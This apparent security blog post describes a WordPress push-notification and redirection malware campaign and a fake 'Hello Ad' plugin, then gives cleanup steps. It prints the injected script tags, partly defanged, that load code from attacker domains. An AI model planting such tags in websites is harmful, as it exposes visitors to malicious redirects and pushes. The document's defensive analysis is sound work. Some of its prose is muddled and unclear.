Last Updated: 30th July, 2022

WordPress Push Notification and Redirection Malware: Several malicious domains where redirecting takes place include justcannabis [dot] online, iclickcdn [dot] com, asoulrox [dot] com and inpagepush [dot] com. This article has been combined with the push notifications malware on WordPress and on-going redirection malware campaign on WordPress websites.

Hackers actually take it one step forward this season to meet this attack operation more advanced by adding a ‘Hello Ad‘ plugin to compromised WordPress websites that look genuine. Details about it, as follows.

WordPress Push Notification And Redirection Malware Symptoms

1. Vulgar Push Notifications: When visiting your website visitors are displayed malicious/vulgar push notifications.

2. Website Redirection: Redirection of the website to malicious websites by clicking on a link from your website (which will ideally at least go to pages inside your WordPress).

Several malicious domains where redirecting takes place include justcannabis [dot] online, iclickcdn [dot] com and asoulrox [dot] com, inpagepush [dot] com.

3. Unknown Plugins Found: In some of these scenarios we have found a new malicious plugin with the name ‘Hello Ad‘ installed in WordPress.

4. Mobile Only Virus Or Device Specific: Users have found that such a malware very well covers it. This would not send the push notifications or redirect users at all times. The behavior is device sensitive. The malware often only displays push alerts on mobile devices, but it often redirects newcomers, not those who have accessed the website recently.

Malicious Hello Ad Plugin Bizarre Instance

Users have also seen plugin ‘Hello Ad‘ installed with those malicious websites to redirect users to websites managed by hackers. This reasonable sounding plug-in adds to something like the source page the very next malicious JavaScript code:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn(dot)com(forward slash - /)</em>tag(dot)min(dot)js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current(forward slash - /)</em>tag(dot)min(dot)js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush(dot)com <em>(forward slash - /)</em> 400<em>(forward slash - /)</em>3336649" data-cfasync="false" async="async"><span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start"></span></script>

The coding of this plugin includes a major role in creating the redirection. And so, with every new campaign, users have seen hackers advance and resist this.

How To Fix WordPress Push Notification And Redirection Malware, Hello Ad And Redirection Hack

1. Well, Look In The Obvious Locations: Hackers have certain favorite locations in which the virus/malware code is installed. Once you start restoring your WordPress, the best way to proceed with these is to. At first, one should focus on the following files:

.htaccess
index.php
wp-content/themes/{themeName}/functions.php
wp-config.php
Core theme files

2. Find And Remove Hello Ad Plugin: Whenever you notice this plugin that you assume your programmer is ‘legitimate looking‘ or you may have implemented it in the past – please uninstall it because that is not the circumstance.

3. Removing Redirection: Redirection attacks in WordPress have already been happening for a long time now. You need to pay attention into the database tables, core source code and quite often the configuration files of your server to take care of malicious redirection hacks.

Search for scripts/loaded resources from unidentified URLs. Hackers also keep upgrading their methods to prevent security firms from coming onto the radar, the underlying concept is much the same.

Hackers often adapt their techniques, exploit vulnerabilities that are not identified for the community and integrate multiple exploits to design a hack.

Oh yes, it’s a rather work of art indeed, for them as well the decoders too! Whilst removing the hack is one aspect, it takes something more lasting to ensure one never gets hacked.